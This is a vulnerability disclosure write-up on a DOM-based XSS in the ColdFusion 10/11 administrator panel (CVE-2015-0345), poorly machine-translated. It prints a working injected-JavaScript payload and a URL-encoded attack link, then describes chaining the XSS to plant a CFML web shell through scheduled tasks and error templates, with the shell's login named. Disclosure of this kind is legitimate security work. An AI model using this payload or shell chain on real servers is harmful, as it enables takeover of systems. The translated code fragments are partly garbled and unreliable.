ColdFusion explosion: chain reaction from XSS to RCE

ColdFusion explosion: chain reaction from XSS to RCE

I found a DOM-based cross-site scripting vulnerability while auditing the Management Panel of ColdFusion 10 and 11. In this article, I will show you how to use this vulnerability to obtain remote code execution from the ColdFusion application server.

After discovering this vulnerability, I disclosed the entire process to the Adobe security team. CVE assigned a CVE number for this vulnerability: CVE-2015-0345
Install patches on the ColdFusion Management Panel to fix the vulnerability and ensure that the management panel is not leaked.

Note: This vulnerability is only applicable to users who have passed Management Panel authentication. Therefore, obtain remote code execution through the exploit recorded below, and finally execute the final XSS vector.

Vulnerability Analysis

The Management Panel of ColdFusion is the core interface of its configuration service. It includes but is not limited to user management, database configuration, and server management. When the ColdFusion Management page dynamically previews and displays files or directories, the JavaScript library jqFileTree. js is used to coordinate the server-side APIs.

Visit the following ColdFusion Management page to see the jqFileTree. js library used:
/CFIDE/administrator/filedialog/index. cfm? Type = dir & fromjscript = true & dialogStyle = selectDirectory & formelem = ORMSearchIndexDirectory & defaultPath =


FileTree -- ColdFusion API provides the file and folder path in the system.

You can directly access the List format of the file and folder paths returned by the ajax api and access the following URL:
/CFIDE/administrator/ajaxtree/jqueryFileTree. cfm? Type = dir

By combining these factors, you can use the path of the JavaScript request to see the desired situation.


ColdFusion uses JavaScript to implement this function. It uses the ajax api to call the fileTree function to accommodate all files and folders. The ajax api content is parsed using fileTree. files and folders are returned to the called API and then added to the pathbox user interface, as shown in the first figure. ColdFusion executes the following JavaScript:

$('#fileTreeDemo_1').fileTree({script:'../../administrator/ajaxtree/jqueryFileTree.cfm?type=dir',expanded: '\x2F'}, function(file) {path = file;document.getElementById("pathbox").value = path;});

The value of this script is that it does not provide hard encoding to the file tree, but is placed in the page loading content in the JavaScript environment. This is dynamically generated based on the URL entered by the user.

Use the ColdFusion server script to insert the string into the HTML source of the page, instead of using the client to insert the string:
Insert the value to the previous JavaScript source code.
'.../Administrator/ajaxtree/jqueryFileTree. cfm? Type = dir'

"? Type = dir "is a part of the string obtained from the user input (URL), so it can be considered as the user input.

Through some tests, I found that the "type" parameter is incorrectly encoded in the JavaScript environment.

After ColdFusion's Cross-Site Scripting filtering and special character encoding are enabled, traditional XSS vectors become pale and powerless. In addition, the tags and angle brackets (> and
Therefore, the best choice is to create a suitable JavaScript payload.

XSS proof of concept

After tampering, I constructed the following payload to trigger the document. location prompt:
', Expanded:' \ x2f'}, function (file) {path = file; document. getElementById ("pathbox "). value = path;}); prompt (document. location); $ ('# fileTreeDemo_1 '). fileTree ({script :'.. /.. /administrator/ajaxtree/jqueryFileTree. cfm? Type = dir

The above payload is separated from the existing function and then executes malicious JavaScript. In this example, we have injected JavaScript and will execute prompt (document. location ).

The remaining part of payload is the correct configuration of the fileTree function. This is to ensure that the ColdFusion file/folder browser still runs normally on the page, so as to reduce the suspicion of the target.

The above payload uses the URL encoding and replaces the type parameter value with the original URL:

http://127.0.0.1:8500/CFIDE/administrator/filedialog/index.cfm?type=dir%27%2c%65%78%70%61%6e%64%65%64%3a%27%5c%78%32%46%27%7d%2c%66%75%6e%63%74%69%6f%6e%28%66%69%6c%65%29%7b%70%61%74%68%20%3d%20%66%69%6c%65%3b%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%74%68%62%6f%78%22%29%2e%76%61%6c%75%65%20%3d%20%70%61%74%68%3b%7d%29%3b%70%72%6f%6d%70%74%28%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%29%3b%24%28%27%23%66%69%6c%65%54%72%65%65%44%65%6d%6f%5f%31%27%29%2e%66%69%6c%65%54%72%65%65%28%7b%73%63%72%69%70%74%3a%27%2e%2e%2f%2e%2e%2f%61%64%6d%69%6e%69%73%74%72%61%74%6f%72%2f%61%6a%61%78%74%72%65%65%2f%6a%71%75%65%72%79%46%69%6c%65%54%72%65%65%2e%63%66%6d%3f%74%79%70%65%3d%64%69%72&fromjscript=true&dialogStyle=selectDirectory&formelem=ORMSearchIndexDirectory&defaultPath=

After the target accesses the URL above, any JavaScript code has been inserted in this example, prompt (document. location); will be executed in the browser. The following figure is sufficient to prove:


Proof of XSS to RCE

I have created two payloads for the affected system. The first request to disable the password of the ColdFusion Management Panel is payload, and the second request is to upload a WEB backdoor Shell.

In order to make this article clean, I will focus on the most practical one.

However, both payloads can be found in my Github.

Payload

Payload #2. As mentioned above, you can find it in Github. perform the following operations to upload the Shell (once the Administrator executes it ):

1. GET requests a CFIDE Management page to obtain the CSRF Token

2. the POST request requests/CFIDE/administrator/scheduler/scheduleedit. cfm parameters related to submission.

3. Add a task in the POST request. a cfml shell has been uploaded to/CFIDE/update_cf.log.

4. the POST request changes the 404 and 500 templates to execute/CFIDE/update_cf.log.

Once payload is successfully executed, you can access your ColdFusion shell at/404.cfm,/500. cfm or by constructing a 404 or 500 error.

Payload outputs complete installation paths such as CSRF token, ColdFusion, and shell execution location information for debugging. The following figure shows the JavaScript console information after the Administrator executes the PoC:


Access URLs/404.cfm or/500. cfm will return to the logon page of the backdoor Shell. The login name configured by this Shell is god and the password is default. After logging in, you may execute such commands, run SQL queries, edit files, and upload or download files from the server. The backdoor interface is shown in:


Once an attacker successfully enters the Shell, the internal network may be broken through the loop. Attackers can also obtain more information by improving their permissions.

Conclusion

On March 26, Adobe successfully fixed the DOM-type XSS vulnerability. Thanks to the quick response from the Adobe security team.

When setting applications, sticking to the company's guidelines is very important. ColdFusion's vulnerability is a good example. Follow Adobe's best practices (Adobe best example) and make sure that the ColdFusion Management Panel is not open to the outside. If you do not do so, you must prepare for the next patch.